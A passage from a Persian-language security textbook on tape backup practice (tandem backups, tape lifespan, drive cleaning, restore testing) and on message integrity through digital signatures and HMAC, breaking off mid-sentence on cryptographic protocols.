‫ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺩﻭ ﻣﺠﻤﻮﻋﺔ ﻣﺠﺰﺍﻱ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﭘﺸﺖ ﺳﺮ ﻫﻢ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ .‬ﺑـﺎ ﺍﻳـﻦ ﺍﺳـﺘﺮﺍﺗﮋﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‪ ،‬ﺩﻭ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ )ﺑﻨﺎﻣﻬﺎﻱ ‪ A‬ﻭ ‪ (B‬ﺗﻬﻴﻪ ﻣﻲﻛﻨﻴﺪ‪ .‬ﺳﭙﺲ ﻭﻗﺘﻲ ﺍﻭﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺮﺍﻳﺸﻲ ﺧـﻮﺩ ‪ -‬ﺍﻓﺰﺍﻳـﺸﻲ ‪ - A‬ﺭﺍ ﺍﻧﺠـﺎﻡ‬
‫ﺩﺍﺩﻳﺪ‪ ،‬ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺗﻬﻴﺔ ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ‪ A‬ﺳﺎﺧﺘﻪ ﻳﺎ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ‪ -‬ﺣﺘـﻲ ﺍﮔـﺮ ﺩﺭ ﭘـﺸﺘﻴﺒﺎﻥ ‪ B‬ﻣﻮﺟـﻮﺩ ﺑﺎﺷـﻨﺪ ‪-‬‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻣﻲﻛﻨﻴﺪ‪ .‬ﺩﻭﻣﻴﻦ ﺑﺎﺭﻱ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﺪ ‪ -‬ﺍﻓﺰﺍﻳﺸﻲ ‪ - B‬ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺗﻬﻴﺔ ﺁﺧﺮﻳﻦ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ‪ B‬ﺳﺎﺧﺘﻪ ﻳﺎ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﻣﻲﻧﻮﻳﺴﻴﺪ ‪ -‬ﺣﺘﻲ ﺍﮔﺮ ﺩﺭ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ‪ A‬ﻣﻮﺟﻮﺩ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﺳﻴـﺴﺘﻢ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺧﺮﺍﺑـﻲ‬
‫ﺭﺳﺎﻧﻪ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻣﻘﺎﻭﻡ ﺍﺳﺖ‪ ،‬ﭼﻮﻥ ﺍﺯ ﻫﺮ ﻓﺎﻳﻞ ﺩﺭ ﺩﻭ ﻣﺤﻞ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻫﺮﭼﻨﺪﺍﻳﻨﻜﺎﺭ ﺯﻣـﺎﻧﻲ ﻛـﻪ ﺷـﻤﺎ ﺑـﺮﺍﻱ ﺗﻬﻴـﺔ‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺻﺮﻑ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﺩﻭ ﺑﺮﺍﺑﺮ ﻣﻲﻛﻨﺪ‪.‬‬

‫ﺟﺎﻳﮕﺰﻳﻨﻲ ﻧﻮﺍﺭﻫﺎ ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ‬


‫ﻧﻮﺍﺭﻫﺎ ﺭﺳﺎﻧﺔ ﻓﻴﺰﻳﻜﻲ ﻫﺴﺘﻨﺪ ﻭ ﻫﺮ ﺑﺎﺭ ﻛﻪ ﺷﻤﺎ ﺑﻮﺳﻴﻠﻪ ﻧﻮﺍﺭﮔﺮﺩﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺗﺎ ﺍﻧﺪﺍﺯﻩﺍﻱ ﻛﻴﻔﻴﺘﺸﺎﻥ ﭘﺎﻳﻴﻦ ﻣﻲﺁﻳﺪ‪ .‬ﺑﺮ ﺍﺳﺎﺱ‬
‫ﺗﺠﺮﺑﺔ ﺧﻮﺩ ﺍﺯ ﻧﻮﺍﺭﮔﺮﺩﺍﻥ ﻭ ﻧﻮﺍﺭ‪ ،‬ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻫﺮ ﻧﻮﺍﺭ ﻳـﻚ ﻃـﻮﻝ ﻋﻤـﺮ ﻣﻔﻴـﺪ ﺗﻌﻴـﻴﻦ ﻛﻨﻴـﺪ‪ .‬ﺑﻌـﻀﻲ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺑـﺮﺍﻱ ﻧﻮﺍﺭﻫﺎﻳـﺸﺎﻥ‬
‫ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻳﻲ ﻣﻲﮔﺬﺍﺭﻧﺪ )ﺑﺮﺍﻱ ﻣﺜﺎﻝ ‪ ۳‬ﺳﺎﻝ ﻳﺎ ‪ ۲۰۰۰‬ﭼﺮﺧﻪ(‪ ،‬ﻭﻟﻲ ﺑﻌﻀﻲ ﻫﻢ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﻧﻤﻲﻛﻨﻨﺪ‪ .‬ﺧﻮﺏ ﺩﻗـﺖ ﻛﻨﻴـﺪ ﻛـﻪ ﻓﺮﻭﺷـﻨﺪﻩ ﺩﺭ ﺍﻳـﻦ‬
‫ﺯﻣﻴﻨﻪ ﭼﻪ ﺗﻮﺻﻴﻪﺍﻱ ﺩﺍﺭﺩ ﻭ ﺁﻧﺮﺍ ﺯﻳﺮ ﭘﺎ ﻧﮕﺬﺍﺭﻳﺪ‪ .‬ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻫﺰﻳﻨﻪﺍﻱ ﻛﻪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﻧـﻮﺍﺭ ﺑﻌـﺪ ﺍﺯ ﺍﺗﻤـﺎﻡ ﻋﻤـﺮ ﻣﻔﻴـﺪ ﺁﻥ‬
‫ﭘﺲﺍﻧﺪﺍﺯ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺑﺎ ﻫﺰﻳﻨﺔ ﺍﻣﻜﺎﻥ ﺟﺒﺮﺍﻥ ﻧﺸﺪﻥ ﻳﻚ ﺧﺴﺎﺭﺕ ﺍﺳﺎﺳﻲ ﺑﺮﺍﺑﺮﻱ ﻧﻤﻲﻛﻨﺪ‪.‬‬

‫ﻧﻮﺍﺭﮔﺮﺩﺍﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺗﻤﻴﺰ ﻧﮕﻬﺪﺍﺭﻳﺪ‬


‫ﺍﮔﺮ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻧﻮﺍﺭ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺯﻣﺎﻧﻲ ﭘﻴﺸﮕﻴﺮﺍﻧﺔ ﻓﺮﻭﺷﻨﺪﺓ ﻧﻮﺍﺭﮔﺮﺩﺍﻥ ﭘﻴﺮﻭﻱ ﻛﻨﻴﺪ ﻭ ﻃﺒﻖ ﺗﻮﺻﻴﻪﻫﺎ ﺍﺯ ﻳـﻚ‬
‫ﻓﺸﻨﮓ ﺗﻤﻴﺰﻛﻨﻨﺪﺓ ﻣﻨﺎﺳﺐ ﻳﺎ ﻳﻚ ﻣﮑﺎﻧﻴﺰﻡ ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻧﺎﺗﻮﺍﻧﻲ ﺩﺭ ﺧﻮﺍﻧﺪﻥ ﻳﻚ ﻧﻮﺍﺭ ﺑﺪﻟﻴﻞ ﻛﺜﻴﻒ ﺑﻮﺩﻥ ﻧـﻮﺍﺭﮔﺮﺩﺍﻥ ﺁﺯﺍﺭﺩﻫﻨـﺪﻩ‬
‫ﺍﺳﺖ؛ ﺧﺼﻮﺻﹰﺎ ﻭﻗﺘﻲ ﻣﻌﻠﻮﻡ ﺷﻮﺩ ﺩﺍﺩﻩﺍﻱ ﻛﻪ ﺭﻭﻱ ﻧﻮﺍﺭ ﻧﻮﺷﺘﻪﺍﻳﺪ ﺧﺮﺍﺏ ﺍﺳﺖ ﻭ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻳﻚ ﺧﺮﺍﺑﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﺑﮕﻴﺮﺩ‪.‬‬

‫ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﭘﺸﺘﻴﺒﺎﻥ‬


‫ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺎﻳﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﭼﻨﺪ ﻓﺎﻳﻞ ﺭﺍ ﺑﺮﺍﻱ ﺍﺣﻴﺎ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺨﻮﺍﻧﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺷـﻤﺎ‬
‫ﺑﺪﺭﺳﺘﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺍﺳﺘﺎﻧﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺩﺭﺑﺎﺭﺓ ﻣﺮﺍﻛﺰ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩﺍﻧﺪ ﻭ ﻭﻗﺘـﻲ ﺳـﺮﺍﻍ‬
‫ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺧﻮﺩ ﺭﻓﺘﻪﺍﻧﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﻏﻴﺮﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻳﺎﻓﺘﻪﺍﻧﺪ‪ .‬ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﻴﺠـﺔ ﻧﻮﺍﺭﻫـﺎﻱ ﺑـﻲﻛﻴﻔﻴـﺖ‪ ،‬ﺭﻭﺍﻟﻬـﺎﻱ ﻧﺎﻣﻨﺎﺳـﺐ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﺮﺍﺏ‪ ،‬ﺧﻄﺎﻱ ﺍﭘﺮﺍﺗﻮﺭ‪ ،‬ﻳﺎ ﻣﺸﻜﻼﺕ ﺩﻳﮕﺮ ﺑﺎﺷﺪ‪.‬‬

‫‪121 U.S. National Aeronautics and Space Administration‬‬


‫‪122 Tandem Backup‬‬
‫‪٣١١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺣﺪﺍﻗﻞ ﻳﻜﺒﺎﺭ ﺩﺭ ﺳﺎﻝ ﺑﺎﻳﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﻛﻞ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺍﺣﻴﺎ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﺑﺪﺭﺳﺘﻲ ﻛﺎﺭ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻣﺘﻔﺎﻭﺕ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱﻧﺸﺪﻩ ﺷﺮﻭﻉ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﻤﺎﻡ ﻧﻮﺍﺭﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺣﻴﺎ ﻛﻨﻴـﺪ ﻭ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺑﻜـﺎﺭ‬
‫ﺍﻧﺪﺍﺯﻳﺪ ﻳﺎ ﻧﻪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﻳﺪ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ ﺩﺭ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﺍﺯ ﺩﺳـﺖ ﺭﻓﺘـﻪﺍﻧـﺪ‪ .‬ﺍﻳـﻦ ﺁﺯﻣﺎﻳـﺸﻬﺎﻱ‬
‫ﻋﻤﻠﻲ ﺑﻬﺘﺮﻳﻦ ﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻛﺸﻒ ﻣﺸﻜﻼﺕ ﻭ ﺣﻞ ﺁﻧﻬﺎ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻳﻚ ﺁﺯﻣﺎﻳﺶ ﺑﺴﻴﺎﺭ ﻣﻨﺎﺳﺐ‪ ،‬ﺍﻧﺘﺨﺎﺏ ﻳﻚ ﻓﺎﻳﻞ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﻳﻜﺒﺎﺭ ﺩﺭ ﻫﻔﺘﻪ ﻳﺎ ﻳﻜﺒﺎﺭ ﺩﺭ ﻣﺎﻩ ﻭ ﺗﻼﺵ ﺑـﺮﺍﻱ ﺍﺣﻴـﺎﻱ ﻣﺠـﺪﺩ ﺁﻥ ﺍﺳـﺖ‪.‬‬
‫ﺍﻳﻨﻜﺎﺭ ﻧﻪ ﺗﻨﻬﺎ ﻣﺸﺨﺺ ﺧﻮﺍﻫﺪ ﻛﺮﺩ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺟﺎﻣﻊ ﻫﺴﺘﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺗﺠﺮﺑﻪ ﺍﻳﻦ ﺍﺣﻴﺎﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﻤﻠﻴـﺎﺕ ﺍﺣﻴـﺎﻱ ﻭﺍﻗﻌـﻲ ﺭﺍ ﺑـﺴﻴﺎﺭ‬
‫ﺳﺎﺩﻩﺗﺮ ﻛﻨﺪ‪.‬‬
‫ﺑﺤﺚ ﻣﻔﺼﻞ ﺩﺭﺑﺎﺭﺓ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻭ ﺍﺣﻴﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺿﻮﻉ ﻳﻚ ﻛﺘﺎﺏ ﻣﺠﺰﺍ ﺑﺎﺷﺪ ‪ -‬ﻛﺘﺎﺏ ﻛﻮﺭﺗﻴﺲ ﭘﺮﻳﺴﺘﻮﻥ‪ ،١٢٣‬ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‬
‫ﻭ ﺗﺮﻣﻴﻢ ‪ ١٢٤Unix‬ﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﺑﻪ ﭼﺎﭖ ﺭﺳﻴﺪﻩ ﻳﻚ ﻧﻤﻮﻧﺔ ﻋﺎﻟﻲ ﺍﺳﺖ‪.‬‬

‫ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻧﺘﻘﺎﻝ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﻭﻗﺘﻲ ﺩﺍﺩﻩﺍﻱ ﺭﺍ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑـﺮﺍﻱ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ ﻣـﻲﻓﺮﺳـﺘﻴﺪ‪،‬‬
‫ﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺷﻤﺎ ﻓﺮﺳﺘﺎﺩﻩﺍﻳﺪ ‪ -‬ﻣﺤﺎﻓﻈﺖﺷﺪﻩ ﺍﺯ ﺧﺮﺍﺑﻲ ﺗﺼﺎﺩﻓﻲ ﻳﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﻋﻤﺪﻱ ‪ -‬ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ‪ .‬ﻳﻚ ﺍﺳـﺘﺮﺍﺗﮋﻱ‬
‫ﻣﺘﺪﺍﻭﻝ ﺷﺎﻣﻞ ﺍﻣﻀﺎﻱ ﻓﺎﻳﻞ ﺑﺼﻮﺭﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ‪ -‬ﺑﺎ ﻣﺤﺎﺳﺒﺔ ﻳﻚ ﺧﻼﺻﺔ ﺭﻣﺰﺷﺪﻩ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺧﻼﺻﻪ ﺑﺎ ﻳـﻚ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﻣﺘﻘـﺎﺭﻥ ﻳـﺎ‬
‫ﻧﺎﻣﺘﻘﺎﺭﻥ ‪ -‬ﻭ ﺳﭙﺲ ﺍﺭﺳﺎﻝ ﺁﻥ ﺑﻪ ﻫﻤﺮﺍﻩ ﻓﺎﻳﻞ )ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻮﺩﺵ ﻫﻢ ﺑﺪﻟﻴﻞ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷـﺪ( ﺍﺳﺖ‪ .‬ﮔﻴﺮﻧـﺪﻩ ﺧﻼﺻـﻪ ﺭﺍ ﺍﺯ‬
‫ﺭﻭﻱ ﻓﺎﻳﻞ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩﻩ ﻭ ﺳﭙﺲ ﺧﻼﺻﺔ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻨﺪﻭ ﻣﻄﺎﺑﻘﺖ ﻛﺮﺩﻧﺪ‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ ﭘﻴﺎﻡ ﺗـﻀﻤﻴﻦ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺗﺎﺑﻊ ‪ hash‬ﺗﺼﺪﻳﻖ ﭘﻴﺎﻡ‪ (HMAC) ١٢٥‬ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﻳﻜﭙﺎﺭﭼﮕﻲ ﭘﻴﺎﻣﻲ ﺍﻧﺘﻘﺎﻝﻳﺎﻓﺘﻪ ﺑﻴﻦ ﺩﻭ ﻃﺮﻑ ﻛﻪ ﺭﻭﻱ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣـﺰﻱ‬
‫ﻣﺸﺘﺮﮎ ﺑﺎ ﻫﻢ ﺗﻮﺍﻓﻖ ﻛﺮﺩﻩﺍﻧﺪ ﻣﻲﺑﺎﺷﺪ‪ HMAC .‬ﭘﻴﺎﻡ ﺍﺻﻠﻲ ﻭ ﻳﻚ ﻛﻠﻴﺪ ﺭﺍ ﺑﺮﺍﻱ ﻣﺤﺎﺳﺒﺔ ﻳـﻚ ﺗـﺎﺑﻊ ﺧﻼﺻـﻪﭘﻴـﺎﻡ ﺍﺯ ﻫـﺮ ﺩﻭﻱ ﺍﻳﻨﻬـﺎ‬
‫ﺗﺮﻛﻴﺐ ﻣﻲﻛﻨﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻃﻼﻋﺎﺕ ﺍﺿﺎﻓﻲ ﻣﺜﻞ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺳﺮﻱ ﭘﺮﻭﺗﻜﻞ ﻧﻴﺰ ﮔﻨﺠﺎﻧﺪﻩ ﻣﻲﺷﻮﺩ ﺗﺎ ﺣﻤﻼﺕ ﻭﺍﻛﻨﺸﻲ ﺭﺍ ﺧﻨﺜـﻲ ﻛﻨـﺪ‪.‬‬
‫ﻓﺮﺳﺘﻨﺪﺓ ﭘﻴﺎﻡ‪ ،HMAC ،‬ﻛﻠﻴﺪ‪ ،‬ﻭ ﻫﺮ ﺍﻃﻼﻋﺎﺕ ﺍﺿﺎﻓﻪ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩﻩ ﻭ ‪ HMAC‬ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﭘﻴﺎﻡ ﺍﺻﻠﻲ ﺍﻧﺘﻘﺎﻝ ﻣﻲﺩﻫـﺪ‪ .‬ﮔﻴﺮﻧـﺪﻩ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﻴﺎﻡ ﻭ ﻛﭙﻲ ﺧﻮﺩ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ‪ HMAC ،‬ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻛﻨﺪ )ﺑﻪ ﻫﻤﺮﺍﻩ ﺍﻃﻼﻋﺎﺕ ﺍﺿـﺎﻓﻪ‪ ،‬ﻣﺜـﻞ ﺷـﻤﺎﺭﺓ ﺳـﺮﻱ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ(‪ ،‬ﻭ‬
‫ﺳﭙﺲ ‪ HMAC‬ﻣﺤﺎﺳﺒﻪ ﺷﺪﻩ ﺭﺍ ﺑﺎ ‪ HMAC‬ﺩﺭﻳﺎﻓﺖ ﺷﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﺒﻴﻨﺪ ﻛﻪ ﺁﻳﺎ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ‪ ،‬ﻭ ﺍﮔﺮ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻨﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﭼﻮﻥ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻋﻮﺽ ﻧﺸﺪﻩ‪ ،‬ﮔﻴﺮﻧﺪﻩ ﺧﻮﺍﻫﺪ ﺩﺍﻧﺴﺖ ﻛﻪ ﭘﻴﺎﻡ ﺍﺻﻠﻲ ﺗﻐﻴﻴﺮ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻻ ‪HMAC‬ﻫﺎ ﺑﺮﺍﻱ ﻣﻘﺎﻭﻡ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎﻱ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧـﺪ‪ ،‬ﭼـﻮﻥ ﺑـﻪ ﻧـﺴﺒﺖ ﺍﻣـﻀﺎﻫﺎﻱ‬ ‫ﻣﻌﻤﻮ ﹰ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺴﻴﺎﺭ ﺳﺮﻳﻌﺘﺮ ﻣﺤﺎﺳﺒﻪ ﻣﻲﺷﻮﻧﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺯ ﻧﻈﺮ ﺍﻧﺪﺍﺯﻩ ﻛﻮﭼﻜﺘﺮ ﻫﺴﺘﻨﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻦ ﻣﻮﺍﺭﺩ‪HMAC ،‬ﻫـﺎ ﺑـﺮ ﺍﺳـﺎﺱ ﻳـﻚ‬
‫ﻻ ﺑﺎ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ‬ ‫ﻛﻠﻴﺪ ﻣﺸﺘﺮﮎ ﭘﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺍﺯ ﺧﻄﺮ ﻣﺤﺎﻓﻈﺖ ﺷﻮﺩ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺍﺯ ﺗﺮﻛﻴـﺐ‬
‫ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﭼﻨﺪﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧـﺪ‪ .‬ﺍﻳـﻦ ﭘﺮﻭﺗﻜﻠﻬـﺎ ﻣﻌﻤـﻮ ﹰ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧﺪ ﺗﺎ ﻣﺒﺎﺩﻟﺔ ﻛﻠﻴﺪ‪ ،‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ،‬ﻭ ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﭘﻴﺎﻡ ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﻨﺪ‪ ،‬ﺑـﻪ ﺍﺿـﺎﻓﺔ‬
‫ﻣﺸﺨﺼﺎﺕ ﺍﻳﻨﻜﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﭼﮕﻮﻧﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ‪ ،‬ﺍﺳﺘﻮﺍﺭﻧﺎﻣﻪﻫﺎﻱ ﺗﺒﺎﺩﻟﻲ ﻭ ﻛﻠﻴﺪﻫﺎﻱ ﺟﻠـﺴﻪ ﺑـﻪ‬
